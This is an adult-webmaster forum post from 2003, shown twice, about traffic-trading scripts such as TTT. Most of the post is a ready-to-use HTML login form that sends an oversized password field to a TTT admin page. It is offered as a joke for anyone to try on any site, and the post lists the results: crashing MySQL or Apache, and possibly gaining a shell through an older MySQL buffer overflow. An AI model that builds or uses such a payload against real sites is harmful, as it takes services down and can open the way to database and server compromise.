GoFuckYourself.com - Adult Webmaster Forum - View Single Post

PowerCum · 04-21-2003, 09:24 AM

Hmmm nice post.

I have had a stupid idea... lets make a GPL lisenced trading script that has the same features that ttt, ept, cjultra, ucj and rb4, and no the real 1% that ttt takes or the pseudoreal 2% (3,3% if you test it) that cjultra takes.

This way users will be able to edit the script as they want and all you will be happy... or perhaps not so much.

...
...
...

One more thing...

-form action="http://SOME-TTT-SITE-HERE/tttadmin/index.php" method="POST"-
-table width="800" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#000000"-
-tr--td--table width="100%" border="0" cellpadding="0" cellspacing="0"-
-tr--td--div align="center"-
-table width="350" border="0" cellspacing="2" cellpadding="0"-
-tr-
-td width="200"--strong--font size="2"-Username:-/font--/strong--/td-
-td width="250"--input name="username" type="text" id="username3" size="30" maxlength="50"--/td-
-/tr--td width="200"--strong--font size="2"-Password:-/font--/strong--/td-
-td width="250"--input name="password" type="text" id="password" size="30000" maxlength="50" value="PUT-BETWEEN--512KB-AND-28MB-RANDOM-STUFF-HERE"--/td-
-/tr-
-tr--td--input name="login" type="submit" class="buttons" id="login" value=" Login "--/td-
-/tr-

-/table-

-/form-

Insert this form on any html page and try to log in, the effects are pretty funny.
Effects:
1) You cannot login --> increase the crap stuff about 152 kb more or 1 Mb if you want and try again (insert coin for another game)
2) You crash the mysql daemon --> the site goes down untill mysql is restarted
3) You crash the apache because it is running out of the box red hat installation --> same as 2, but this time they need to restart the apache
4) You know enought to make a shellcode and exploit the MySQL buffer overflow that affects several versions prior to 3.23.45 ---> you gain a free shell with the same privileges the mysql daemon is running... also you have access to all the databases.
5) You decide to fix the bugs because you do not want to wait Choker to release a bugfix (perhaps with more bugs) --> You appear on this list as a cheater and Choker drives your site down
6) You decide to use another script --> You will have the same bugs and several more because most programmers know to make programs work, but not to work good.

NOTE to Choker: Do not take it as offense dude, your script is a nice one. All the other scripts have the same bugs and others have some more severe too (TTT has some other bugs, but this is one of the funny bugs it has).

And... do not call me cheater, because I do not use TTT

04-21-2003, 09:24 AM
PowerCum CjOverkill Industry Role: Join Date: Apr 2003 Location: Woldwide Posts: 1,328	Hmmm nice post. I have had a stupid idea... lets make a GPL lisenced trading script that has the same features that ttt, ept, cjultra, ucj and rb4, and no the real 1% that ttt takes or the pseudoreal 2% (3,3% if you test it) that cjultra takes. This way users will be able to edit the script as they want and all you will be happy... or perhaps not so much. ... ... ... One more thing... -form action="http://SOME-TTT-SITE-HERE/tttadmin/index.php" method="POST"- -table width="800" border="1" align="center" cellpadding="0" cellspacing="0" bordercolor="#000000"- -tr--td--table width="100%" border="0" cellpadding="0" cellspacing="0"- -tr--td--div align="center"- -table width="350" border="0" cellspacing="2" cellpadding="0"- -tr- -td width="200"--strong--font size="2"-Username:-/font--/strong--/td- -td width="250"--input name="username" type="text" id="username3" size="30" maxlength="50"--/td- -/tr--td width="200"--strong--font size="2"-Password:-/font--/strong--/td- -td width="250"--input name="password" type="text" id="password" size="30000" maxlength="50" value="PUT-BETWEEN--512KB-AND-28MB-RANDOM-STUFF-HERE"--/td- -/tr- -tr--td--input name="login" type="submit" class="buttons" id="login" value=" Login "--/td- -/tr- -/table- -/form- Insert this form on any html page and try to log in, the effects are pretty funny. Effects: 1) You cannot login --> increase the crap stuff about 152 kb more or 1 Mb if you want and try again (insert coin for another game) 2) You crash the mysql daemon --> the site goes down untill mysql is restarted 3) You crash the apache because it is running out of the box red hat installation --> same as 2, but this time they need to restart the apache 4) You know enought to make a shellcode and exploit the MySQL buffer overflow that affects several versions prior to 3.23.45 ---> you gain a free shell with the same privileges the mysql daemon is running... also you have access to all the databases. 5) You decide to fix the bugs because you do not want to wait Choker to release a bugfix (perhaps with more bugs) --> You appear on this list as a cheater and Choker drives your site down 6) You decide to use another script --> You will have the same bugs and several more because most programmers know to make programs work, but not to work good. NOTE to Choker: Do not take it as offense dude, your script is a nice one. All the other scripts have the same bugs and others have some more severe too (TTT has some other bugs, but this is one of the funny bugs it has). And... do not call me cheater, because I do not use TTT